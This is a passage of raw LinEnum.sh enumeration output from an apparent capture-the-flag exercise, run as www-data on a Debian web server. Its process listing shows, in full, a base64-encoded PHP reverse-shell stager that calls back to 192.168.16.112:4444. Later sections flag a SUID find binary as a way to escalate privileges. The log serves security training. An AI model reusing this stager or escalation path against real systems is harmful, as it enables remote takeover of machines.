0.0 0 0 ? S 00:08 0:00 [kworker/u:30]1036 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]1037 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]1038 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon1039 root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]1040 root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]1041 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w1042 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd1043 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon1044 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]1045 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]1046 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd1047 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c51048 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid1049 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start1050 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd1051 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system1052 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start1053 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start1054 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start1055 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start1056 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron1057 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe1058 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=33061059 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error1060 101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m1061 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty21062 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty31063 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty41064 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty51065 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty61066 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]1067 root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth01068 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd1069 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty11070 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start1071 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start1072 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start1073 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start1074 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start1075 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start1076 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'1077 www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));1078 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh1079 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh1080 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]1081 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]1082 www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1083 www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1084 www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a1085 www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh1086 www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux1087

1088

1089 [00;31m[-] Process binaries and associated permissions (from above list): [00m1090 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash1091 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash1092 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty1093 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd1094 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind1095 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon1096 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid1097 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache21098 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd1099 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron1100 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim41101 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld1102 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd1103 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd1104 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd1105

1106

1107 [00;31m[-] /etc/init.d/ binary permissions: [00m1108 total 2801109 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .1110 drwxr-xr-x 85 root root 4096 May 7 01:08 ..1111 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot1112 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start1113 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop1114 -rw-r--r-- 1 root root 2427 Oct 16 2012 README1115 -rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid1116 -rwxr-xr-x 1 root root 7820 May 26 2018 apache21117 -rwxr-xr-x 1 root root 1071 Jun 25 2011 atd1118 -rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs1119 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh1120 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh1121 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh1122 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh1123 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup1124 -rwxr-xr-x 1 root root 3033 Jul 3 2012 cron1125 -rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus1126 -rwxr-xr-x 1 root root 6435 Feb 11 2018 exim41127 -rwxr-xr-x 1 root root 1329 Oct 16 2012 halt1128 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh1129 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh1130 -rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd1131 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup1132 -rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs1133 -rwxr-xr-x 1 root root 1990 May 21 2012 kmod1134 -rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans1135 -rwxr-xr-x 1 root root 995 Oct 16 2012 motd1136 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh1137 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh1138 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh1139 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh1140 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh1141 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh1142 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh1143 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql1144 -rwxr-xr-x 1 root root 4322 Mar 14 2013 networking1145 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common1146 -rwxr-xr-x 1 root root 1346 May 20 2012 procps1147 -rwxr-xr-x 1 root root 6120 Oct 16 2012 rc1148 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local1149 -rwxr-xr-x 1 root root 117 Oct 16 2012 rcS1150 -rwxr-xr-x 1 root root 639 Oct 16 2012 reboot1151 -rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond1152 -rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin1153 -rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind1154 -rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog1155 -rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs1156 -rwxr-xr-x 1 root root 590 Oct 16 2012 single1157 -rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton1158 -rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh1159 -rwxr-xr-x 1 root root 8827 Nov 9 2012 udev1160 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab1161 -rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs1162 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh1163 -rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot1164 -rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom1165 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils1166 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common1167

1168

1169 [00;31m[-] /etc/init/ config file permissions: [00m1170 total 481171 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .1172 drwxr-xr-x 85 root root 4096 May 7 01:08 ..1173 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf1174 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf1175 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf1176 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf1177 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf1178 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf1179 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf1180 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf1181 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf1182 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf1183

1184

1185 [00;31m[-] /lib/systemd/* config file permissions: [00m1186 /lib/systemd/:1187 total 4.0K1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system1189

1190 /lib/systemd/system:1191 total 56K1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants1196 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service1197 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket1198 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service1199 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket1200 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket1201 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service1202 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service1203 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service1204 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service1205 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket1206

1207 /lib/systemd/system/dbus.target.wants:1208 total 01209 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket1210

1211 /lib/systemd/system/multi-user.target.wants:1212 total 01213 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service1214

1215 /lib/systemd/system/sockets.target.wants:1216 total 01217 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket1218 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket1219 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket1220

1221 /lib/systemd/system/basic.target.wants:1222 total 01223 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service1224 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service1225

1226

1227 [00;33m### SOFTWARE ############################################# [00m1228 [00;31m[-] MYSQL version: [00m1229 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.21230

1231

1232 [00;31m[-] Apache user configuration: [00m1233 APACHE_RUN_USER=www-data1234 APACHE_RUN_GROUP=www-data1235

1236

1237 [00;33m### INTERESTING FILES #################################### [00m1238 [00;31m[-] Useful file locations: [00m1239 /bin/nc1240 /bin/netcat1241 /usr/bin/wget1242 /usr/bin/gcc1243 /usr/bin/curl1244

1245

1246 [00;31m[-] Installed compilers: [00m1247 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler1248 ii gcc 4:4.7.2-1 i386 GNU C compiler1249 ii gcc-4.7 4.7.2-5 i386 GNU C compiler1250 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)1251 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files)1252

1253

1254 [00;31m[-] Can we read/write sensitive files: [00m1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group1257 -rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow1259

1260

1261 [00;31m[-] SUID files: [00m1262 -rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount1263 -rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping1264 -rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su1265 -rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping61266 -rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount1267 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at1268 -rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh1269 -rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd1270 -rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp1271 -rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn1272 -rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd1273 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail1274 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find1275 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim41276 -rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown1277 -rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign1278 -rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper1280 -rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs1281

1282

1283 [00;33m[+] Possibly interesting SUID files: [00m1284 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find1285

1286

1287 [00;31m[-] SGID files: [00m1288 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent1289 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate1291 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile1292 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage1293 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write1294 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock1295 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall1296 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab1297 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry1298 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail1299 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile1300 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter1301 -rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd1302

1303

1304 [-] Can't search *.conf files as no keyword was entered1305

1306 [-] Can't search *.php files as no keyword was entered1307

1308 [-] Can't search *.log files as no keyword was entered1309

1310 [-] Can't search *.ini files as no keyword was entered1311

1312 [00;31m[-] All *.conf files in /etc (recursive 1 level): [00m1313 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf1314 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf1315 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf1316 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf1317 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf1318 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf1320 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf1321 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf1323 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf1324 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf1325 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf1326 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf1327 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf1328 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf1329 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf1330 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf1331 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf1333 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf1334 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf1336 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf1337

1338

1339 [00;31m[-] Location and contents (if accessible) of .bash_history file(s): [00m1340 /home/flag4/.bash_history1341 cd1342 ls1343 vi flag4.txt1344 ls1345 exit1346

1347

1348 [00;31m[-] Any interesting mail in /var/mail: [00m1349 total 81350 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..1352

1353

1354 [00;33m### SCAN COMPLETE #################################### [00m

裕浩
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值